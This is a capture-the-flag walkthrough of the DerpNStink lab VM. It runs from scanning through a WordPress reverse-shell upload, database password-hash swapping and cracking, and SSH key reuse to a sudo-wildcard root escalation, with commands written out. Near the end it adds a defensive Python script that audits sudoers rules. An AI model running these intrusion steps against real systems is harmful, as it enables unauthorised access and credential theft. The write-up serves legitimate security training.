
# DerpNStink

## Enumeration

### nmap

```
nmap -sC -sV -oA nmap/DNS 192.168.1.116
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-25 04:37 EDT
Nmap scan report for 192.168.1.116
Host is up (0.0017s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
|   2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
|   256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_  256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: 00:0C:29:7D:91:B5 (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.06 seconds
```

Let's open the IP address in the web browser.

![](/files/-M8A-Tc63uSURbQHHd-d)

If we open Inspect Element and expand all the divs, we can find the first flag.

![](/files/-M8AtBYTz53KeFg07TxL)

### Dirb

```
dirb http://192.168.1.116/
```

```
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon May 25 04:50:28 2020
URL_BASE: http://192.168.1.116/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.116/ ----
==> DIRECTORY: http://192.168.1.116/css/                                                                                              
+ http://192.168.1.116/index.html (CODE:200|SIZE:1298)                                                                                
==> DIRECTORY: http://192.168.1.116/javascript/                                                                                       
==> DIRECTORY: http://192.168.1.116/js/                                                                                               
==> DIRECTORY: http://192.168.1.116/php/                                                                                              
+ http://192.168.1.116/robots.txt (CODE:200|SIZE:53)                                                                                  
+ http://192.168.1.116/server-status (CODE:403|SIZE:293)                                                                              
==> DIRECTORY: http://192.168.1.116/temporary/                                                                                        
==> DIRECTORY: http://192.168.1.116/weblog/   
```

Both the nmap and dirb scans show a `robots.txt`, so let's navigate there.

![](/files/-M8A-bpmu9adbWHI9tns)

![](/files/-M8A-nADQayOSMWBS1eW)

![](/files/-M8A-peND3WV5ba3bMAv)

As we can see, we don't have permission to view `/php`, and `/temporary` tells us to try harder.

We can also see `/weblog` in the dirb scan. After navigating there I got an error.

![](/files/-M8A0wAF-4zNWFAzVWLH)

I edit `/etc/hosts` and add an entry for the IP there.

![](/files/-M8A18I_PPouJrFRtDs3)

After refreshing the page, we can see a WordPress blog.

![](/files/-M8A1IkPjz5VfQNw2zkx)

### Wpscan

```
wpscan --url http://derpnstink.local/weblog/ --enumerate u,ap --plugins-detection aggressive
```

```
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://derpnstink.local/weblog/ [192.168.1.116]
[+] Started: Mon May 25 04:55:03 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.7 (Ubuntu)
 |  - X-Powered-By: PHP/5.5.9-1ubuntu4.22
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://derpnstink.local/weblog/xmlrpc.php
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
 | Confirmed By:
 |  - Link Tag (Passive Detection), 30% confidence
 |  - Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://derpnstink.local/weblog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://derpnstink.local/weblog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.6.18 identified (Latest, released on 2020-04-29).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://derpnstink.local/weblog/, Match: '-release.min.js?ver=4.6.18'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://derpnstink.local/weblog/, Match: 'WordPress 4.6.18'

[+] WordPress theme in use: twentysixteen
 | Location: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/readme.txt
 | [!] The version is out of date, the latest version is 2.1
 | Style URL: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.18
 | Style Name: Twenty Sixteen
 | Style URI: https://wordpress.org/themes/twentysixteen/
 | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.18, Match: 'Version: 1.3'

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:02:19 <===================================================> (86907 / 86907) 100.00% Time: 00:02:19
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://derpnstink.local/weblog/wp-content/plugins/akismet/
 | Last Updated: 2020-04-29T13:02:00.000Z
 | Readme: http://derpnstink.local/weblog/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 4.1.5
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/akismet/, status: 200
 |
 | Version: 3.1.11 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/akismet/readme.txt

[+] slideshow-gallery
 | Location: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/
 | Last Updated: 2019-07-12T13:09:00.000Z
 | Readme: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt
 | [!] The version is out of date, the latest version is 1.6.12
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/, status: 403
 |
 | Version: 1.4.6 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=========================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] unclestinky
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Mon May 25 04:57:36 2020
[+] Requests Done: 86966
[+] Cached Requests: 12
[+] Data Sent: 22.571 MB
[+] Data Received: 11.789 MB
[+] Memory used: 368.992 MB
[+] Elapsed time: 00:02:33
```

We got 2 plugins and 2 usernames. On the first try, I managed to log in with the username `admin` and password `admin`.

![](/files/-M8A48-VH770y56yuUtw)

After clicking around, I found that under Manage Slides we can edit the slideshow, and at the bottom there is an image upload. So, I decided to upload a shell file.

## Exploitation

### Reverse Shell

Download the PHP reverse shell file from [pentestmonkey](http://pentestmonkey.net/tools/web-shells/php-reverse-shell).

![](/files/-M8A8rQguug1Beb06XHW)

Change the IP and port to our machine's, then set up a listener:

```
nc -nlvp 4444
```

Then we can go to `Manage Slides`.

![](/files/-M8A9BFotlq6wQ7zAU_A)

And I click `randonx` to edit.

![](/files/-M8A9GfV72ePZW9NqC1y)

Scroll to the bottom and we can see this:

![](/files/-M8A9MKJOVlMMww74vgD)

![](/files/-M8A9OdyfjxVHE77aUZU)

Upload the reverse shell file.

Then go back to `/weblog`.

![](/files/-M8A9XpPMpqKsYgBNXR2)

Click the right arrow on the slides until you get a reverse shell!

![](/files/-M8A9hmK2YT5edTOYzmV)

And then we can type the following to get a proper TTY:

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

![](/files/-M8AB65F6nW4te-tQBf4)

When I ran `linpeas.sh`, I found the MySQL username and password.

![](/files/-M8AXPhE_-0Y-RIAMuop)

Then we can go to `/php/phpmyadmin` to log into the MySQL database.

Then go to the `wordpress` database and open the `wp_users` table.

I found that the `unclestinky` hash was too difficult to crack, so to make it easy I copied the `admin` hash over the `unclestinky` hash.

![](/files/-M8AXoO5GHipji0WjZa2)

Then we can log into WordPress again.

Go to the post, and we will find the second flag.

![](/files/-M8AXxltNJ2zqarz_9GQ)

We then go back to phpMyAdmin, open the `mysql` database and go to the `user` table.

![](/files/-M8A_KCYqMNmJ9eG0_U6)

Then we can take the unclestinky password hash and crack it at [CrackStation](https://crackstation.net/).

![](/files/-M8A_FZV7tIsr_ApCvok)

We got the password `wedgie57`.

We can then ssh in as the user **stinky**.

![](/files/-M8A_l_8LWEbsg6b1-Bl)

Then I went to the Desktop folder and found the third flag!

![](/files/-M8AcAXRKFje0jBKokrS)

After that, I went to the `/home` directory and found an `ftp` folder.

![](/files/-M8AaD31-qV51hM0-d0h)

Inside, there is a chain of nested `ssh` directories.

![](/files/-M8AaGHia-QN2AHLXWzE)

After changing directory 7 times, we reach `key.txt`.

![](/files/-M8AaPr59JfMLStF9RaF)

It contains an RSA private key.

![](/files/-M8AaS-q0S10JqMiR6-D)

This might be the key for ssh access as the user stinky.

We save the RSA key to a file called `id_rsa` in `/root/.ssh`.

![](/files/-M8AegPqDUo-EXzDGFtP)

We can see that `id_rsa` has permissions that are too open, so we need to change them.

Type `chmod 700 id_rsa`.

Then we can ssh into it:

```
ssh -i /root/.ssh/id_rsa stinky@192.168.1.116
```

![](/files/-M8Af1enPMmbax61wP6i)

Then, navigating to `/home/Stinky/Documents`, we find a pcap file.

![](/files/-M8Agsv7hUdUAHL5rg5M)

Transfer it to our machine using `nc`.

Then analyse the file using `wireshark`.

![](/files/-M8AoEfeiNID2L6wbgBn)

Then we can follow the TCP stream, and this is the password for the user mrderp.

We then `su` to the user `mrderp`.

Then type `sudo -l`.

![](/files/-M8Ao_sU7JxhftpVv51D)

## Privilege Escalation

We can see that inside `/home/mrderp` there is no folder called `binaries`.

![](/files/-M8ArfqLy3Y8T_WE-Z1O)

So we need to create one:

```
# the sudo entry points at /home/mrderp/binaries/derpy*, which does not exist yet
mkdir binaries
cd binaries
# any file matching the derpy* wildcard inside binaries/ will be run as root
echo "/bin/bash" > derpy.sh
chmod 777 derpy.sh
sudo /home/mrderp/binaries/derpy*
```
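The wildcard in that sudo entry is what makes the escalation work, so as an added example (not part of the original write-up) here is a small Python audit that parses sudoers-style rules and flags the two properties that combine here: a wildcard in the command path and a path under the invoking user's own home. The sample rules are constructed; only the first mirrors the shape of the rule in this walkthrough.

```python
import re

# Constructed sample of sudoers-style rules (not the box's real file).
SAMPLE_RULES = """
mrderp ALL=(ALL) /home/mrderp/binaries/derpy*
stinky ALL=(ALL) /usr/bin/apt-get
www-data ALL=(ALL) NOPASSWD: /usr/bin/find, /usr/bin/vim
"""

# user  host=(runas)  [TAG: ...]  cmd[, cmd...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+\S+=\((?P<runas>[^)]*)\)\s+"
    r"(?:(?:[A-Z]+:\s*)+)?(?P<cmds>.+)$"
)

def parse_rules(text):
    """Return a list of {user, runas, cmd} dicts, one per command in each rule."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            rules.append({"user": m.group("user"),
                          "runas": m.group("runas"),
                          "cmd": cmd.strip()})
    return rules

def audit_rule(rule):
    """Return the list of weaknesses found in one parsed rule."""
    findings = []
    cmd = rule["cmd"]
    if any(ch in cmd for ch in "*?["):
        findings.append("wildcard in command path")
    # A command under the invoking user's home (or /tmp) can be replaced by that user.
    if cmd.startswith("/home/%s/" % rule["user"]) or cmd.startswith("/tmp/"):
        findings.append("command path is writable by the invoking user")
    return findings

def audit(text):
    """Map each command to its findings; an empty list means nothing was flagged."""
    return {r["cmd"]: audit_rule(r) for r in parse_rules(text)}

if __name__ == "__main__":
    for cmd, findings in audit(SAMPLE_RULES).items():
        print(cmd, "->", ", ".join(findings) or "ok")
```

Run it against the output of `sudo -l` (after trimming the header lines) to see which entries deserve a second look.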

![](/files/-M8AseND0DJfb0blwC8T)

Got root!

Navigate to `/root/Desktop` to get the fourth flag.

![](/files/-M8AslmYWD48UKj9q8ql)
